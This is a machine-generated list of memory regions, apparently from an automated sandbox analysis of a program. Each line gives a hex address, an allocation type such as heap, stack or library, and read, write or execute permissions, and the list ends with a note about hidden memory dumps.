trusted library allocation
page read and write
14C4942D000
trusted library allocation
page read and write
6FE29000
unkown
page readonly
1E7926B6000
heap
page read and write
66CE000
stack
page read and write
2D5D000
stack
page read and write
1AA88A90000
heap
page read and write
14C37428000
heap
page read and write
1AA88FC0000
remote allocation
page read and write
AE3000
trusted library allocation
page execute and read and write
7F80000
trusted library allocation
page read and write
73E000
stack
page read and write
44D000
stack
page read and write
729E000
stack
page read and write
6C6D1000
unkown
page read and write
1AA88B24000
heap
page read and write
4984000
trusted library allocation
page read and write
2784F154000
heap
page read and write
1E7A354E000
trusted library allocation
page read and write
14C493C1000
trusted library allocation
page read and write
14C515E0000
heap
page execute and read and write
6D9873000
stack
page read and write
1AA88940000
heap
page read and write
731E000
stack
page read and write
1E792360000
heap
page read and write
ACD000
stack
page read and write
1E7A28C5000
trusted library allocation
page read and write
2774000
direct allocation
page read and write
41BEE7E000
stack
page read and write
7540000
trusted library allocation
page read and write
14C37660000
trusted library allocation
page read and write
41BE6F7000
stack
page read and write
6FF0000
trusted library allocation
page read and write
2719000
direct allocation
page read and write
696E000
stack
page read and write
6D9DB7000
stack
page read and write
1E7908F0000
heap
page read and write
14C373A9000
heap
page read and write
14C513CE000
heap
page read and write
41BE9FB000
stack
page read and write
275F000
direct allocation
page read and write
1E7A8F4E000
trusted library allocation
page read and write
14C38F10000
trusted library allocation
page read and write
1AA88AD0000
heap
page read and write
1AA88B25000
heap
page read and write
1E79083D000
heap
page read and write
A85000
heap
page read and write
2784EE43000
heap
page read and write
896E000
stack
page read and write
7FFF444D0000
trusted library allocation
page read and write
1E790650000
heap
page read and write
1E7A2B3F000
trusted library allocation
page read and write
5299000
trusted library allocation
page read and write
D02000
unkown
page readonly
86CE000
stack
page read and write
AE4000
trusted library allocation
page read and write
67CE000
stack
page read and write
719E000
stack
page read and write
1E790A45000
heap
page read and write
7570000
trusted library allocation
page read and write
14C39070000
heap
page read and write
1AA88AD0000
heap
page read and write
6C52000
heap
page read and write
7FFF44440000
trusted library allocation
page execute and read and write
1AA88AD1000
heap
page read and write
69EE000
stack
page read and write
41BE3FE000
stack
page read and write
6D9CF9000
stack
page read and write
E70000
heap
page read and write
1E7A2851000
trusted library allocation
page read and write
41BEAF7000
stack
page read and write
8239000
heap
page read and write
19530FF000
stack
page read and write
1E79083B000
heap
page read and write
7FFF44460000
trusted library allocation
page execute and read and write
14C51610000
heap
page read and write
6FE26000
unkown
page write copy
8264000
heap
page read and write
830000
trusted library section
page read and write
7560000
trusted library allocation
page read and write
8040000
trusted library allocation
page read and write
6DA5000
heap
page read and write
41BE47D000
stack
page read and write
1E790839000
heap
page read and write
749E000
stack
page read and write
2FBE000
stack
page read and write
7FFF4428B000
trusted library allocation
page read and write
14C51807000
heap
page read and write
7050000
trusted library allocation
page read and write
74A0000
trusted library allocation
page read and write
47D1000
trusted library allocation
page read and write
41BEC7B000
stack
page read and write
4990000
trusted library allocation
page read and write
8460000
trusted library allocation
page execute and read and write
7F90000
trusted library allocation
page read and write
2784EF20000
heap
page read and write
1E7908E2000
heap
page read and write
7FFF44330000
trusted library allocation
page execute and read and write
7590000
trusted library allocation
page read and write
14C373DB000
heap
page read and write
2784EE20000
heap
page read and write
14C37680000
trusted library allocation
page read and write
AD0000
trusted library allocation
page read and write
6DAECE000
stack
page read and write
41BDFA3000
stack
page read and write
26F7000
direct allocation
page read and write
1AA88FC0000
remote allocation
page read and write
41BE5FD000
stack
page read and write
4869000
trusted library allocation
page read and write
81C0000
heap
page read and write
7FFF44390000
trusted library allocation
page execute and read and write
14C373A0000
heap
page read and write
7B7000
stack
page read and write
6C6CB000
unkown
page read and write
41BE4FE000
stack
page read and write
745E000
stack
page read and write
8490000
trusted library allocation
page execute and read and write
14C37465000
heap
page read and write
678E000
stack
page read and write
14C517CD000
heap
page read and write
72DE000
stack
page read and write
D01000
unkown
page execute read
D01000
unkown
page execute read
692E000
stack
page read and write
8382000
trusted library allocation
page read and write
14C39990000
trusted library allocation
page read and write
6F6E000
stack
page read and write
804A000
trusted library allocation
page read and write
6D9AFD000
stack
page read and write
462F000
trusted library allocation
page read and write
680D000
stack
page read and write
7078000
heap
page read and write
1E7922B0000
trusted library allocation
page read and write
7F70000
trusted library allocation
page execute and read and write
6815000
heap
page execute and read and write
593000
heap
page read and write
2CA0000
heap
page read and write
5382000
trusted library allocation
page read and write
26ED000
direct allocation
page read and write
2798000
direct allocation
page read and write
B71000
heap
page read and write
41BECFC000
stack
page read and write
2DEE000
stack
page read and write
14C517C2000
heap
page read and write
2729000
direct allocation
page read and write
68AB000
stack
page read and write
874E000
stack
page read and write
1AA88AB1000
heap
page read and write
14C373E7000
heap
page read and write
8283000
heap
page read and write
7FFF44510000
trusted library allocation
page read and write
D04000
unkown
page readonly
2784ECA0000
heap
page read and write
140000
heap
page read and write
D02000
unkown
page read and write
41BE27E000
stack
page read and write
2784EF90000
heap
page read and write
6D9A7E000
stack
page read and write
6D9B7F000
stack
page read and write
309D000
stack
page read and write
6FD71000
unkown
page execute read
420E000
stack
page read and write
6FED000
stack
page read and write
858000
heap
page read and write
D04000
unkown
page readonly
4100000
trusted library allocation
page read and write
6FD71000
unkown
page execute read
668E000
stack
page read and write
6C6D2000
unkown
page readonly
1E7A2876000
trusted library allocation
page read and write
7F978000
trusted library allocation
page execute and read and write
26FF000
direct allocation
page read and write
4110000
trusted library allocation
page read and write
6E0C000
heap
page read and write
14C37423000
heap
page read and write
4150000
heap
page readonly
735E000
stack
page read and write
6D9FBE000
stack
page read and write
7500000
trusted library allocation
page read and write
5C0000
heap
page read and write
6E06000
heap
page read and write
CCE000
stack
page read and write
630C000
stack
page read and write
41BFBCE000
stack
page read and write
5291000
trusted library allocation
page read and write
14C37690000
heap
page readonly
14C37260000
heap
page read and write
8450000
trusted library allocation
page read and write
6DA33D000
stack
page read and write
1E7907F0000
heap
page read and write
7FFF44540000
trusted library allocation
page read and write
6D99FE000
stack
page read and write
1E7928D8000
trusted library allocation
page read and write
There are 593 hidden memdumps, click here to show them.